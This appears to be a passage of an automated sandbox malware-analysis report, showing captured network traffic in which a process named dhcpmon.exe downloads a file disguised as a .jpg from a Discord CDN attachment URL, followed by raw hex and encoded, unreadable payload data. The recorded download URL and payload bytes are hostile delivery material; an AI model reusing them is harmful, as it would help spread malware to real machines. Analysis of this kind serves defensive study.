eje qeO qxw eje qeO qpx eje qeO qcc eje qjh qjc eje qjh qjp eje qeO qcq eje qjh qjI eje qjh qjc eje qeO qwj eje qjh qjw eje qeO qce h eep qxh qcw eep qxh qIw eep qjO qp
2021-10-27 01:03:08 UTC	866	IN	Data Raw: 65 78 20 71 49 65 20 71 63 71 20 65 65 78 20 71 49 65 20 71 78 6a 20 65 65 78 20 71 49 65 20 71 78 77 20 65 65 78 20 71 49 65 20 71 49 70 20 65 65 78 20 71 49 65 20 71 78 49 20 65 65 78 20 71 49 6a 20 71 63 68 20 65 65 78 20 71 49 65 20 71 78 6a 20 65 65 78 20 71 49 65 20 71 63 4f 20 68 20 65 6a 49 20 71 49 6a 20 71 6a 4f 20 65 6a 49 20 71 49 6a 20 71 78 77 20 65 6a 49 20 71 49 65 20 71 63 63 20 65 6a 49 20 71 49 65 20 71 63 78 20 65 6a 49 20 71 49 6a 20 71 6a 77 20 65 6a 49 20 71 49 6a 20 71 78 65 20 65 6a 49 20 71 49 65 20 71 63 6a 20 65 6a 49 20 71 49 65 20 71 63 49 20 65 6a 49 20 71 49 65 20 71 63 4f 20 65 6a 49 20 71 49 65 20 71 63 49 20 65 6a 49 20 71 49 65 20 71 4f 68 20 65 6a 49 20 71 49 6a 20 71 63 65 20 65 6a 49 20 71 49 65 20 71 63 71 20 65 6a Data Ascii: ex qIe qcq eex qIe qxj eex qIe qxw eex qIe qIp eex qIe qxI eex qIj qch eex qIe qxj eex qIe qcO h ejI qIj qjO ejI qIj qxw ejI qIe qcc ejI qIe qcx ejI qIj qjw ejI qIj qxe ejI qIe qcj ejI qIe qcI ejI qIe qcO ejI qIe qcI ejI qIe qOh ejI qIj qce ejI qIe qcq ej
2021-10-27 01:03:08 UTC	882	IN	Data Raw: 78 70 20 71 70 49 20 65 6a 49 20 71 78 4f 20 71 49 77 20 65 6a 49 20 71 78 4f 20 71 77 49 20 65 6a 49 20 71 78 70 20 71 70 77 20 65 6a 49 20 71 78 4f 20 71 78 65 20 65 6a 49 20 71 78 4f 20 71 78 49 20 65 6a 49 20 71 78 70 20 71 70 77 20 65 6a 49 20 71 78 4f 20 71 49 77 20 68 20 65 6a 78 20 71 63 68 20 71 6a 71 20 65 6a 78 20 71 63 68 20 71 63 6a 20 65 6a 78 20 71 78 4f 20 71 70 6a 20 65 6a 78 20 71 78 4f 20 71 70 68 20 65 6a 78 20 71 63 68 20 71 49 6a 20 65 6a 78 20 71 78 4f 20 71 70 68 20 65 6a 78 20 71 63 68 20 71 6a 71 20 65 6a 78 20 71 63 68 20 71 49 49 20 65 6a 78 20 71 63 68 20 71 49 78 20 65 6a 78 20 71 63 68 20 71 78 4f 20 65 6a 78 20 71 78 4f 20 71 77 4f 20 65 6a 78 20 71 63 68 20 71 49 49 20 65 6a 78 20 71 78 4f 20 71 70 6a 20 65 6a 78 20 71 63 Data Ascii: xp qpI ejI qxO qIw ejI qxO qwI ejI qxp qpw ejI qxO qxe ejI qxO qxI ejI qxp qpw ejI qxO qIw h ejx qch qjq ejx qch qcj ejx qxO qpj ejx qxO qph ejx qch qIj ejx qxO qph ejx qch qjq ejx qch qII ejx qch qIx ejx qch qxO ejx qxO qwO ejx qch qII ejx qxO qpj ejx qc
2021-10-27 01:03:08 UTC	898	IN	Data Raw: 20 71 49 70 20 65 65 49 20 71 4f 68 20 71 77 68 20 65 65 49 20 71 4f 71 20 71 6a 71 20 65 65 49 20 71 4f 71 20 71 49 71 20 65 65 49 20 71 4f 68 20 71 77 68 20 65 65 49 20 71 4f 68 20 71 70 70 20 65 65 49 20 71 4f 71 20 71 63 6a 20 65 65 49 20 71 4f 68 20 71 77 78 20 68 20 65 65 49 20 71 4f 71 20 71 63 63 20 65 65 49 20 71 4f 71 20 71 6a 63 20 65 65 49 20 71 4f 68 20 71 70 70 20 65 65 49 20 71 4f 68 20 71 70 6a 20 65 65 49 20 71 4f 71 20 71 6a 4f 20 65 65 49 20 71 4f 71 20 71 49 4f 20 65 65 49 20 71 4f 68 20 71 70 49 20 65 65 49 20 71 4f 68 20 71 70 6a 20 65 65 49 20 71 4f 68 20 71 70 77 20 65 65 49 20 71 4f 71 20 71 77 63 20 65 65 49 20 71 4f 68 20 71 4f 68 20 65 65 49 20 71 4f 68 20 71 70 70 20 65 65 49 20 71 4f 68 20 71 70 6a 20 65 65 49 20 71 4f 68 20 Data Ascii: qIp eeI qOh qwh eeI qOq qjq eeI qOq qIq eeI qOh qwh eeI qOh qpp eeI qOq qcj eeI qOh qwx h eeI qOq qcc eeI qOq qjc eeI qOh qpp eeI qOh qpj eeI qOq qjO eeI qOq qIO eeI qOh qpI eeI qOh qpj eeI qOh qpw eeI qOq qwc eeI qOh qOh eeI qOh qpp eeI qOh qpj eeI qOh
2021-10-27 01:03:08 UTC	914	IN	Data Raw: 78 78 20 65 6a 6a 20 71 6a 63 20 71 78 65 20 65 6a 6a 20 71 6a 78 20 71 63 4f 20 65 6a 6a 20 71 6a 78 20 71 77 77 20 65 6a 6a 20 71 6a 78 20 71 77 78 20 65 6a 6a 20 71 6a 63 20 71 78 49 20 65 6a 6a 20 71 6a 78 20 71 49 68 20 65 6a 6a 20 71 6a 78 20 71 49 6a 20 65 6a 6a 20 71 6a 78 20 71 49 65 20 65 6a 6a 20 71 6a 78 20 71 49 6a 20 65 6a 6a 20 71 6a 78 20 71 63 70 20 65 6a 6a 20 71 6a 78 20 71 77 63 20 65 6a 6a 20 71 6a 78 20 71 70 65 20 68 20 65 6a 65 20 71 6a 70 20 71 77 70 20 65 6a 65 20 71 6a 70 20 71 70 6a 20 65 6a 65 20 71 6a 70 20 71 70 78 20 65 6a 65 20 71 6a 70 20 71 77 4f 20 65 6a 65 20 71 6a 4f 20 71 49 49 20 65 6a 65 20 71 6a 4f 20 71 49 4f 20 65 6a 65 20 71 6a 4f 20 71 49 78 20 65 6a 65 20 71 6a 4f 20 71 49 63 20 65 6a 65 20 71 6a 70 20 71 77 Data Ascii: xx ejj qjc qxe ejj qjx qcO ejj qjx qww ejj qjx qwx ejj qjc qxI ejj qjx qIh ejj qjx qIj ejj qjx qIe ejj qjx qIj ejj qjx qcp ejj qjx qwc ejj qjx qpe h eje qjp qwp eje qjp qpj eje qjp qpx eje qjp qwO eje qjO qII eje qjO qIO eje qjO qIx eje qjO qIc eje qjp qw
2021-10-27 01:03:08 UTC	930	IN	Data Raw: 20 65 65 77 20 71 49 63 20 71 77 68 20 65 65 77 20 71 49 63 20 71 49 4f 20 65 65 77 20 71 49 63 20 71 77 65 20 65 65 77 20 71 49 63 20 71 70 63 20 65 65 77 20 71 49 63 20 71 77 63 20 65 65 77 20 71 49 63 20 71 70 77 20 65 65 77 20 71 49 63 20 71 77 65 20 65 65 77 20 71 49 78 20 71 4f 71 20 65 65 77 20 71 49 78 20 71 70 4f 20 65 65 77 20 71 49 63 20 71 49 4f 20 65 65 77 20 71 49 63 20 71 78 71 20 65 65 77 20 71 49 78 20 71 70 4f 20 68 20 65 65 78 20 71 77 71 20 71 70 70 20 65 65 78 20 71 77 68 20 71 70 71 20 65 65 78 20 71 77 71 20 71 70 71 20 65 65 78 20 71 77 71 20 71 70 4f 20 65 65 78 20 71 77 71 20 71 77 71 20 65 65 78 20 71 77 71 20 71 49 4f 20 65 65 78 20 71 77 71 20 71 49 70 20 65 65 78 20 71 77 71 20 71 49 77 20 65 65 78 20 71 77 71 20 71 49 77 20 Data Ascii: eew qIc qwh eew qIc qIO eew qIc qwe eew qIc qpc eew qIc qwc eew qIc qpw eew qIc qwe eew qIx qOq eew qIx qpO eew qIc qIO eew qIc qxq eew qIx qpO h eex qwq qpp eex qwh qpq eex qwq qpq eex qwq qpO eex qwq qwq eex qwq qIO eex qwq qIp eex qwq qIw eex qwq qIw
2021-10-27 01:03:08 UTC	946	IN	Data Raw: 71 71 68 20 71 71 63 20 71 71 49 20 4f 77 20 71 71 68 20 4f 4f 20 71 68 71 20 4f 63 20 4f 63 20 68 20 68 20 68 20 78 20 6a 65 20 71 20 71 20 65 20 63 20 71 20 68 20 68 20 68 20 68 20 49 20 6a 65 20 71 20 71 20 71 77 20 71 65 70 20 71 6a 77 20 70 20 71 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 49 20 65 71 20 71 70 20 65 78 20 71 20 71 70 20 71 65 20 49 20 65 71 20 71 70 20 65 78 20 71 20 71 70 20 70 20 49 20 65 71 20 71 70 20 65 78 20 71 20 71 70 20 71 77 20 49 20 65 71 20 71 70 20 65 78 20 71 20 71 70 20 65 68 20 78 20 77 20 71 20 71 70 20 71 65 20 78 20 77 20 71 20 71 70 20 70 20 78 20 77 20 71 20 71 70 20 71 77 20 78 20 77 20 71 20 71 70 20 65 68 20 6a 20 77 20 71 20 65 20 78 20 68 20 71 20 65 70 20 65 70 20 6a 20 77 20 71 20 70 20 78 20 77 20 71 20 Data Ascii: qqh qqc qqI Ow qqh OO qhq Oc Oc h h h x je q q e c q h h h h I je q q qw qep qjw p q h h h h h h h I eq qp ex q qp qe I eq qp ex q qp p I eq qp ex q qp qw I eq qp ex q qp eh x w q qp qe x w q qp p x w q qp qw x w q qp eh j w q e x h q ep ep j w q p x w q

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49718	162.159.134.233	443	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-27 01:03:26 UTC	955	OUT	GET /attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2021-10-27 01:03:26 UTC	955	IN	HTTP/1.1 200 OK Date: Wed, 27 Oct 2021 01:03:26 GMT Content-Type: image/jpeg Content-Length: 976828 Connection: close CF-Ray: 6a48012d5fc64327-FRA Accept-Ranges: bytes Age: 18 Cache-Control: public, max-age=31536000 ETag: "be30f5911bc96f37b49a11905d15afac" Expires: Thu, 27 Oct 2022 01:03:26 GMT Last-Modified: Tue, 26 Oct 2021 20:23:59 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Cf-Bgj: h2pri Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1635279839570116 x-goog-hash: crc32c=xGchCA== x-goog-hash: md5=vjD1kRvJbze0mhGQXRWvrA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 976828 X-GUploader-UploadID: ADPycduDNcNKudAcRz6osKTk_KjWwpIcT_kNR8UJ2V--3Z8m0poOiEMI9P_muZLQC_1wabNpP26rayGI7bwnkyAWlSI X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g4YrdIoXpqMeU8f7yjB9jatNF30Z%2F8gmin5TUw182RCT%2FFCj3jQxhIIvHplI6LqrcmHjguXqTvjTVPQMRWlXlkRht%2BoOIHshH7jUOdFSniHyhdsDidaLiLzbMeYp0pUK%2Bp8b9w%3D%3D"}],"group":"cf-nel","max_age":604800}
2021-10-27 01:03:26 UTC	956	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
2021-10-27 01:03:26 UTC	956	IN	Data Raw: 68 71 65 6a 78 63 49 77 70 4f 2d 77 77 20 4f 68 20 71 78 78 20 68 20 6a 20 68 20 68 20 68 20 78 20 68 20 68 20 68 20 65 63 63 20 65 63 63 20 68 20 68 20 71 70 78 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 49 78 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 71 65 70 20 68 20 68 20 68 20 71 78 20 6a 71 20 71 70 49 20 71 78 20 68 20 71 70 68 20 4f 20 65 68 63 20 6a 6a 20 71 70 78 20 71 20 77 49 20 65 68 63 20 6a 6a 20 70 78 20 71 68 78 20 71 68 63 20 71 71 63 20 6a 65 20 71 71 65 20 71 71 78 20 71 71 71 20 71 68 6a 20 71 71 78 20 4f 77 20 71 68 4f 20 6a 65 20 4f 4f 20 4f 77 20 71 71 68 20 71 Data Ascii: hqejxcIwpO-ww Oh qxx h j h h h x h h h ecc ecc h h qpx h h h h h h h Ix h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h qep h h h qx jq qpI qx h qph O ehc jj qpx q wI ehc jj px qhx qhc qqc je qqe qqx qqq qhj qqx Ow qhO je OO Ow qqh q
2021-10-27 01:03:26 UTC	958	IN	Data Raw: 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 68 20 65 63 20 78 68 20 65 65 4f 20 71 68 4f 20 71 71 63 20 63 68 20 78 70 20 63 68 20 63 68 20 70 78 20 71 71 78 20 71 71 77 20 71 78 49 20 71 78 6a 20 63 68 20 78 70 20 71 6a 70 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 71 71 65 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 Data Ascii: h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h h ec xh eeO qhO qqc ch xp ch ch px qqx qqw qxI qxj ch xp qjp cx px qqx qqw qhO qqe ch qqe ch cx px qqx qqw qhO qqe ch xp ch cx px qqx qqw qhO qqe ch xp ch cx px qqx qqw qhO qqe ch xp ch cx p
2021-10-27 01:03:26 UTC	959	IN	Data Raw: 65 78 63 20 63 63 20 70 78 20 71 71 78 20 70 63 20 71 68 4f 20 71 71 65 20 63 68 20 65 78 70 20 63 71 20 63 78 20 70 78 20 71 71 65 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 71 70 20 63 78 20 70 78 20 71 70 20 4f 71 20 6a 71 20 65 71 20 4f 78 20 4f 63 20 70 71 20 63 78 20 70 78 20 71 65 49 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 78 70 20 63 78 20 70 78 20 71 71 65 20 71 71 77 20 71 68 4f 20 71 71 65 20 65 78 70 20 78 4f 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 63 6a 20 71 68 4f 20 71 71 65 20 71 71 65 20 6a 68 20 49 78 20 49 4f 20 6a 70 20 Data Ascii: exc cc px qqx pc qhO qqe ch exp cq cx px qqe qqw qhO qqe ch xp ch cx px qqx qqw qhO qqe ch xp qp cx px qp Oq jq eq Ox Oc pq cx px qeI qqw qhO qqe ch xp xp cx px qqe qqw qhO qqe exp xO ch cx px qqx qqw qhO qqe ch xp ch cx px qqx cj qhO qqe qqe jh Ix IO jp
2021-10-27 01:03:26 UTC	960	IN	Data Raw: 71 71 49 20 71 68 4f 20 71 71 65 20 63 78 20 4f 63 20 71 78 20 63 78 20 70 78 20 71 65 68 20 4f 63 20 71 68 4f 20 4f 4f 20 65 20 78 4f 20 63 68 20 49 71 20 70 78 20 71 71 78 20 71 71 77 20 71 71 68 20 71 71 65 20 63 68 20 6a 6a 20 77 49 20 63 65 20 70 78 20 71 71 78 20 71 71 6a 20 65 20 77 77 20 63 68 20 78 70 20 63 49 20 65 70 20 70 78 20 4f 77 20 49 4f 20 71 68 70 20 71 71 65 20 63 77 20 78 70 20 63 68 20 63 78 20 70 68 20 71 71 78 20 71 71 77 20 71 65 78 20 71 78 20 78 4f 20 78 70 20 63 68 20 63 68 20 63 4f 20 77 49 20 71 71 77 20 71 68 4f 20 71 65 65 20 65 78 20 78 70 20 6a 6a 20 49 20 70 63 20 71 71 78 20 71 65 49 20 71 68 4f 20 71 71 65 20 63 68 20 63 6a 20 63 68 20 63 78 20 49 4f 20 71 65 20 71 71 6a 20 71 68 4f 20 71 71 65 20 63 78 20 4f 63 20 71 Data Ascii: qqI qhO qqe cx Oc qx cx px qeh Oc qhO OO e xO ch Iq px qqx qqw qqh qqe ch jj wI ce px qqx qqj e ww ch xp cI ep px Ow IO qhp qqe cw xp ch cx ph qqx qqw qex qx xO xp ch ch cO wI qqw qhO qee ex xp jj I pc qqx qeI qhO qqe ch cj ch cx IO qe qqj qhO qqe cx Oc q
2021-10-27 01:03:26 UTC	962	IN	Data Raw: 20 6a 68 20 71 77 71 20 71 71 78 20 71 71 77 20 71 68 77 20 71 68 65 20 71 4f 71 20 71 63 63 20 63 68 20 63 78 20 70 63 20 4f 68 20 49 71 20 71 68 4f 20 71 71 65 20 63 49 20 49 77 20 71 65 6a 20 63 78 20 70 78 20 71 65 68 20 71 63 20 6a 68 20 63 70 20 63 68 20 78 70 20 63 49 20 6a 63 20 71 65 71 20 71 71 6a 20 70 6a 20 77 68 20 71 71 4f 20 71 77 70 20 63 49 20 63 68 20 63 78 20 70 68 20 70 4f 20 71 71 77 20 71 4f 20 71 65 68 20 63 68 20 78 70 20 63 78 20 65 6a 68 20 4f 65 20 71 71 78 20 71 71 77 20 71 71 70 20 70 70 20 71 71 49 20 78 70 20 63 68 20 49 68 20 49 78 20 65 4f 20 49 65 20 71 68 4f 20 71 71 65 20 63 49 20 65 78 20 63 78 20 63 78 20 70 78 20 70 4f 20 71 71 68 20 49 78 20 71 71 70 20 65 68 20 65 6a 77 20 77 70 20 63 78 20 70 78 20 71 71 78 20 71 Data Ascii: jh qwq qqx qqw qhw qhe qOq qcc ch cx pc Oh Iq qhO qqe cI Iw qej cx px qeh qc jh cp ch xp cI jc qeq qqj pj wh qqO qwp cI ch cx ph pO qqw qO qeh ch xp cx ejh Oe qqx qqw qqp pp qqI xp ch Ih Ix eO Ie qhO qqe cI ex cx cx px pO qqh Ix qqp eh ejw wp cx px qqx q
2021-10-27 01:03:26 UTC	963	IN	Data Raw: 78 20 77 63 20 70 70 20 71 68 6a 20 78 70 20 63 68 20 49 68 20 71 65 49 20 70 78 20 4f 78 20 71 63 78 20 71 71 65 20 78 4f 20 68 20 63 49 20 63 78 20 4f 71 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 65 20 77 70 20 71 68 71 20 70 70 20 71 68 49 20 70 49 20 65 49 20 71 71 6a 20 63 68 20 63 78 20 4f 78 20 70 70 20 70 6a 20 77 68 20 71 6a 63 20 63 68 20 6a 63 20 65 20 63 68 20 70 78 20 71 71 71 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 77 20 78 70 20 63 68 20 6a 4f 20 70 49 20 71 68 6a 20 4f 70 20 49 78 20 4f 70 20 65 68 20 63 71 20 6a 4f 20 78 6a 20 71 65 71 20 71 65 63 20 70 6a 20 49 4f 20 6a 78 20 63 68 20 78 70 20 63 49 20 6a 68 20 77 20 71 71 78 20 71 71 77 20 71 68 6a 20 4f 68 20 65 68 20 65 77 20 65 65 65 20 71 49 Data Ascii: x wc pp qhj xp ch Ih qeI px Ox qcx qqe xO h cI cx Oq qqx qqw qhO qqe ch xp ch ce wp qhq pp qhI pI eI qqj ch cx Ox pp pj wh qjc ch jc e ch px qqq qqw qhO qqe cw xp ch jO pI qhj Op Ix Op eh cq jO xj qeq qec pj IO jx ch xp cI jh w qqx qqw qhj Oh eh ew eee qI
2021-10-27 01:03:26 UTC	964	IN	Data Raw: 63 4f 20 6a 77 20 71 71 77 20 71 68 4f 20 71 65 65 20 65 49 20 6a 77 20 63 71 20 63 78 20 70 65 20 71 71 65 20 4f 4f 20 65 78 77 20 78 20 63 49 20 78 70 20 63 68 20 78 63 20 77 78 20 4f 63 20 71 65 77 20 77 63 20 71 78 20 63 20 78 70 20 63 68 20 63 68 20 71 65 68 20 4f 49 20 4f 78 20 71 71 68 20 71 65 65 20 65 63 20 71 4f 49 20 77 49 20 68 20 70 78 20 71 71 78 20 71 71 6a 20 71 68 77 20 70 70 20 71 68 78 20 78 4f 20 63 68 20 78 70 20 71 65 71 20 71 71 70 20 4f 70 20 71 68 65 20 4f 71 20 78 70 20 6a 70 20 63 77 20 78 4f 20 71 65 78 20 71 68 4f 20 71 71 77 20 71 68 4f 20 71 71 70 20 65 78 20 6a 63 20 65 20 63 6a 20 70 78 20 49 71 20 71 71 77 20 71 68 4f 20 71 71 65 20 6a 78 20 78 70 20 63 68 20 6a 4f 20 70 49 20 71 68 68 20 65 6a 4f 20 65 68 20 49 49 20 63 Data Ascii: cO jw qqw qhO qee eI jw cq cx pe qqe OO exw x cI xp ch xc wx Oc qew wc qx c xp ch ch qeh OI Ox qqh qee ec qOI wI h px qqx qqj qhw pp qhx xO ch xp qeq qqp Op qhe Oq xp jp cw xO qex qhO qqw qhO qqp ex jc e cj px Iq qqw qhO qqe jx xp ch jO pI qhh ejO eh II c
2021-10-27 01:03:26 UTC	966	IN	Data Raw: 77 49 20 71 68 20 63 68 20 63 78 20 70 68 20 65 4f 20 78 6a 20 71 68 4f 20 71 71 65 20 63 49 20 6a 63 20 63 77 20 71 78 20 71 4f 70 20 71 71 78 20 71 71 77 20 71 68 4f 20 4f 70 20 63 77 20 65 78 20 71 68 4f 20 63 78 20 70 78 20 71 65 68 20 71 68 65 20 71 68 49 20 71 71 70 20 6a 63 20 63 63 20 77 6a 20 6a 4f 20 70 78 20 71 71 78 20 71 71 6a 20 65 20 71 49 20 63 68 20 78 70 20 63 49 20 65 49 20 70 71 20 77 78 20 68 20 71 68 4f 20 71 71 65 20 63 68 20 6a 4f 20 71 77 70 20 49 6a 20 70 78 20 71 71 78 20 71 71 6a 20 77 77 20 65 68 70 20 65 63 20 65 65 78 20 78 78 20 6a 68 20 71 77 71 20 71 71 78 20 71 71 77 20 71 68 77 20 4f 77 20 63 6a 20 77 63 20 6a 63 20 63 78 20 70 78 20 71 71 70 20 65 78 4f 20 6a 77 20 71 71 65 20 63 68 20 78 4f 20 65 49 20 71 68 49 20 70 Data Ascii: wI qh ch cx ph eO xj qhO qqe cI jc cw qx qOp qqx qqw qhO Op cw ex qhO cx px qeh qhe qhI qqp jc cc wj jO px qqx qqj e qI ch xp cI eI pq wx h qhO qqe ch jO qwp Ij px qqx qqj ww ehp ec eex xx jh qwq qqx qqw qhw Ow cj wc jc cx px qqp exO jw qqe ch xO eI qhI p
2021-10-27 01:03:26 UTC	967	IN	Data Raw: 20 63 77 20 65 77 20 71 4f 63 20 49 4f 20 71 65 68 20 71 71 78 20 71 71 77 20 71 68 77 20 71 65 78 20 63 70 20 63 68 20 63 6a 20 71 77 65 20 78 63 20 63 70 20 71 71 77 20 71 68 4f 20 71 71 6a 20 49 77 20 71 65 68 20 63 68 20 63 78 20 70 63 20 71 63 20 71 68 68 20 71 68 4f 20 71 71 65 20 63 78 20 63 49 20 78 70 20 78 4f 20 49 77 20 78 65 20 65 6a 4f 20 65 68 20 49 49 20 63 68 20 78 70 20 63 71 20 77 71 20 71 68 65 20 71 71 78 20 71 71 77 20 71 68 70 20 71 6a 20 49 71 20 78 70 20 63 68 20 63 68 20 4f 65 20 71 71 65 20 71 71 78 20 71 71 77 20 78 68 20 71 49 70 20 49 70 20 71 63 6a 20 63 78 20 70 78 20 71 71 63 20 70 20 71 65 63 20 71 71 65 20 63 68 20 63 65 20 63 70 20 63 65 20 70 6a 20 71 68 77 20 78 63 20 65 78 77 20 4f 20 71 70 20 78 70 20 63 68 20 63 63 Data Ascii: cw ew qOc IO qeh qqx qqw qhw qex cp ch cj qwe xc cp qqw qhO qqj Iw qeh ch cx pc qc qhh qhO qqe cx cI xp xO Iw xe ejO eh II ch xp cq wq qhe qqx qqw qhp qj Iq xp ch ch Oe qqe qqx qqw xh qIp Ip qcj cx px qqc p qec qqe ch ce cp ce pj qhw xc exw O qp xp ch cc
2021-10-27 01:03:26 UTC	968	IN	Data Raw: 4f 20 71 68 68 20 71 71 65 20 65 63 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 78 20 78 4f 20 78 78 20 6a 71 20 6a 4f 20 71 71 78 20 70 78 20 71 71 4f 20 71 68 63 20 71 68 6a 20 6a 71 20 6a 6a 20 65 68 20 71 49 20 70 49 20 71 71 4f 20 4f 70 20 49 78 20 4f 77 20 65 68 20 65 65 20 65 78 20 77 63 20 4f 63 20 71 71 78 20 71 71 77 20 71 68 63 20 4f 71 20 65 71 49 20 77 77 20 49 65 20 63 78 20 70 78 20 71 71 70 20 4f 78 20 71 6a 63 20 71 6a 20 49 6a 20 78 70 20 63 68 20 63 68 20 71 65 77 20 71 63 65 20 71 71 77 20 71 65 49 20 49 78 20 63 65 20 78 70 20 71 70 71 20 63 78 20 70 78 20 71 71 78 20 4f 77 20 71 68 4f 20 71 71 65 20 6a 63 20 63 68 20 6a 77 20 71 49 77 20 49 49 20 4f 78 20 4f 78 20 77 63 20 71 71 63 20 71 70 70 20 Data Ascii: O qhh qqe ec xp ch cx px qqx qqw qhO qqx xO xx jq jO qqx px qqO qhc qhj jq jj eh qI pI qqO Op Ix Ow eh ee ex wc Oc qqx qqw qhc Oq eqI ww Ie cx px qqp Ox qjc qj Ij xp ch ch qew qce qqw qeI Ix ce xp qpq cx px qqx Ow qhO qqe jc ch jw qIw II Ox Ox wc qqc qpp
2021-10-27 01:03:26 UTC	970	IN	Data Raw: 68 65 20 6a 4f 20 65 4f 20 6a 65 20 71 49 20 78 77 20 71 68 49 20 71 71 77 20 71 68 4f 20 71 71 49 20 78 4f 20 78 63 20 6a 49 20 65 49 20 4f 78 20 70 78 20 65 49 20 63 20 71 71 65 20 63 68 20 63 70 20 65 78 20 71 49 20 71 65 77 20 71 63 70 20 70 6a 20 77 68 20 71 6a 65 20 78 4f 20 68 20 63 49 20 63 78 20 71 68 68 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 65 20 77 49 20 71 68 78 20 70 70 20 71 68 6a 20 70 49 20 77 6a 20 78 68 20 63 68 20 63 78 20 70 68 20 4f 63 20 71 71 63 20 77 68 20 71 71 63 20 65 68 20 65 77 20 71 4f 70 20 65 70 20 70 49 20 71 71 71 20 71 68 63 20 49 78 20 4f 70 20 65 68 20 77 63 20 78 65 20 63 78 20 70 78 20 71 71 70 20 71 71 70 20 71 65 68 20 71 68 49 20 6a 71 20 63 70 20 65 68 20 70 4f 20 49 71 Data Ascii: he jO eO je qI xw qhI qqw qhO qqI xO xc jI eI Ox px eI c qqe ch cp ex qI qew qcp pj wh qje xO h cI cx qhh qqx qqw qhO qqe ch xp ch ce wI qhx pp qhj pI wj xh ch cx ph Oc qqc wh qqc eh ew qOp ep pI qqq qhc Ix Op eh wc xe cx px qqp qqp qeh qhI jq cp eh pO Iq
2021-10-27 01:03:26 UTC	971	IN	Data Raw: 71 63 6a 20 4f 68 20 78 70 20 78 65 20 6a 77 20 65 77 20 77 71 20 70 78 20 71 78 20 71 71 49 20 71 71 65 20 63 68 20 63 65 20 78 4f 20 78 68 20 77 77 20 4f 63 20 71 65 49 20 77 63 20 71 71 49 20 4f 6a 20 4f 63 20 63 68 20 63 78 20 4f 78 20 70 70 20 70 6a 20 77 68 20 71 63 63 20 65 68 20 65 77 20 71 4f 6a 20 63 78 20 70 78 20 71 71 78 20 71 71 70 20 4f 6a 20 71 65 65 20 63 68 20 65 6a 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 78 70 20 78 6a 20 78 6a 20 65 77 20 4f 78 20 70 78 20 71 78 20 71 71 4f 20 71 71 65 20 63 68 20 63 65 20 6a 71 20 78 70 20 71 65 77 20 71 71 6a 20 70 6a 20 77 68 20 71 6a 65 20 65 78 20 63 68 20 78 65 20 78 65 20 71 65 71 20 71 65 49 20 70 6a 20 65 65 20 71 68 49 20 63 68 20 78 70 20 63 78 20 70 4f Data Ascii: qcj Oh xp xe jw ew wq px qx qqI qqe ch ce xO xh ww Oc qeI wc qqI Oj Oc ch cx Ox pp pj wh qcc eh ew qOj cx px qqx qqp Oj qee ch ej ch cx px qqx qqw qhO qqe xp xj xj ew Ox px qx qqO qqe ch ce jq xp qew qqj pj wh qje ex ch xe xe qeq qeI pj ee qhI ch xp cx pO
